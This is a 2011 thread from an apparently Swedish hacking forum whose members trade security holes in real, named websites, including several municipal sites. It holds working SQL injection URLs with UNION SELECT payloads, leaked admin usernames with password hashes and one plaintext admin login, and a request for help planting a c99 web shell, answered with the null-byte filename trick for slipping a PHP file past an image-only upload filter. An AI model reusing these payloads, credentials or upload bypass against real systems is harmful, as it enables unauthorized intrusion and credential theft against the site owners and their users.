1. Dator och IT
  2. IT-säkerhet

Samling av sidor med säkerhetsbrister - Del 2

Svara
2011-04-29, 03:27
  #2737
j3r01
Medlem
Kod: 
http://www.inf-fni.org/

cjadmin:0ba735fc80f687e41c9132bd55e1737f
TnCi2010:59185cb7ba50a6be6570d9679486ad39

:)


Hur går jag vidare här? ;o

Kod: 
http://www.jumbocast.com/staffdetails.php?staff_id=-2%20union%20select%201,2,3,column_name,5,6,7,8,9,10,11%20from%20informati  on_schema.columns%20where%20table_name--

Kod: 
http://www.lundgren.se/admin
johanl:xrv2k3
Help me göra ngt kul, får inte ens upp en c99 ;o
__________________
Senast redigerad av j3r01 2011-04-29 kl. 04:24.
Citera
2011-04-29, 11:24
  #2738
chippzy
Medlem
SQL Injection. Deras gamla sida hade samma brist där innan.
Sidan verkar fortfarande vara aktiv också. Hur många medlemmar vet jag inte. Säkert några tusen.
__________________
Senast redigerad av chippzy 2011-04-29 kl. 11:27.
Citera
2011-04-29, 11:38
  #2739
j3r01
Medlem
Citat:
Ursprungligen postat av chippzy
SQL Injection. Deras gamla sida hade samma brist där innan.
Sidan verkar fortfarande vara aktiv också. Hur många medlemmar vet jag inte. Säkert några tusen.


Fastnar som vanligt när jag ska få ut tables osv. Nånting fel gör jag, eftersom "CHARACTER_SETS" alltid kmr upp som enda table.. Skulle behöva den guiden som länkades tidigare i tråden men fuskbugg är ju nere D:

Kod: 
http://www.zoopet.com/akvarium/akvarium.php?NR=-648%20union%20select%201,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,  21,22,23,24,25%20FROM%20information_schema.tables%20--
Citera
2011-04-29, 12:48
  #2740
chippzy
Medlem
Citat:
Ursprungligen postat av j3r01
Fastnar som vanligt när jag ska få ut tables osv. Nånting fel gör jag, eftersom "CHARACTER_SETS" alltid kmr upp som enda table.. Skulle behöva den guiden som länkades tidigare i tråden men fuskbugg är ju nere D:

Testa denna.
__________________
Senast redigerad av chippzy 2011-04-29 kl. 13:02.
Citera
2011-04-29, 13:24
  #2741
t0rsken
Bannlyst
Citat:
Ursprungligen postat av j3r01
Kod: 
http://www.lundgren.se/admin
johanl:xrv2k3
Help me göra ngt kul, får inte ens upp en c99 ;o

Har du testat att göra en så kallad null byte-attack? Antar att du har det problemet att du enbart kan ladda upp bildformat (.jpg, .gif, .png etc.)?
Citera
2011-04-29, 15:20
  #2742
j3r01
Medlem
Citat:
Ursprungligen postat av t0rsken
Har du testat att göra en så kallad null byte-attack? Antar att du har det problemet att du enbart kan ladda upp bildformat (.jpg, .gif, .png etc.)?

Inte testat Hur utför jag en sån?
Citera
2011-04-29, 15:29
  #2743
ant'
Medlem
ant's avatar
Citat:
Ursprungligen postat av j3r01
Inte testat Hur utför jag en sån?
namn.php%00.jpg
Citera
2011-04-29, 15:33
  #2744
j3r01
Medlem
Citat:
Ursprungligen postat av ant'
namn.php%00.jpg

Wait whut?

ang

Kod: 
http://www.zoopet.com/akvarium/akvarium.php?NR=-648%20union%20select%201,2,group_concat%28table_name%29,4,5,6,7,8,9,10,11,12,13,14,  15,16,17,18,19,20,%2021,22,23,24,25%20from%20information_schema.tables%20where%20table_schema=databa  se%28%29--

Får jag psykbryt
Citera
2011-04-29, 17:22
  #2745
tmxseven
Medlem
tmxsevens avatar
Citat:
Ursprungligen postat av j3r01
Wait whut?

ang

Kod: 
http://www.zoopet.com/akvarium/akvarium.php?NR=-648%20union%20select%201,2,group_concat%28table_name%29,4,5,6,7,8,9,10,11,12,13,14,  15,16,17,18,19,20,%2021,22,23,24,25%20from%20information_schema.tables%20where%20table_schema=databa  se%28%29--

Får jag psykbryt

Tog mig en titt på: http://www.zoopet.com/akvarium/akvarium.php?NR=648

Resultat:
__________________
Senast redigerad av tmxseven 2011-04-29 kl. 17:38.
Citera
2011-04-29, 17:45
  #2746
t0rsken
Bannlyst
Citat:
Ursprungligen postat av j3r01
Wait whut?

ang

Kod: 
http://www.zoopet.com/akvarium/akvarium.php?NR=-648%20union%20select%201,2,group_concat%28table_name%29,4,5,6,7,8,9,10,11,12,13,14,  15,16,17,18,19,20,%2021,22,23,24,25%20from%20information_schema.tables%20where%20table_schema=databa  se%28%29--

Får jag psykbryt

Genom att byta namn på filen, i detta fallet c99.php för att ta det som exempel, till c99.php%00.jpg så kan det lura filhanteraren att den tror att det är en .jpg-fil, men när det väl kommer till kritan så är det .php-filen som körs.

Låter lite luddigt, men hoppas att du förstod lite iallafall!
Citera
2011-04-30, 04:49
  #2747
Nytt-konto
Medlem
Nytt-kontos avatar
http://www.itel.se/index.php?showprod=131 rätt intressant hash

namn : hash : salt
admin :-e¼yÜÜ l\Òw¤cÞëÎÀ.ÈÝŽm•QY7ÍQ : b6cceb
akabei : ö©ÖèLg“P`CÞ¡w¬ÕÚ›0P$&ÁÈ4Å : da2cb9
ali : 6ŸY*IÇ.ŸHp/nžò : f773a7
Citera
2011-04-30, 11:37
  #2748
tmxseven
Medlem
tmxsevens avatar
Katrineholm, Köping samt Västerås.... [SQLi]
Kod: 
http://troint.katrineholm.se/detail_person.asp?inr=187
http://kungsor.koping.se/KungsorTemplates/Page.aspx?id=4785
http://www1.vasteras.se/booking/foreasp/resfore.asp?StartAt=250
__________________
Senast redigerad av tmxseven 2011-04-30 kl. 11:40.
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in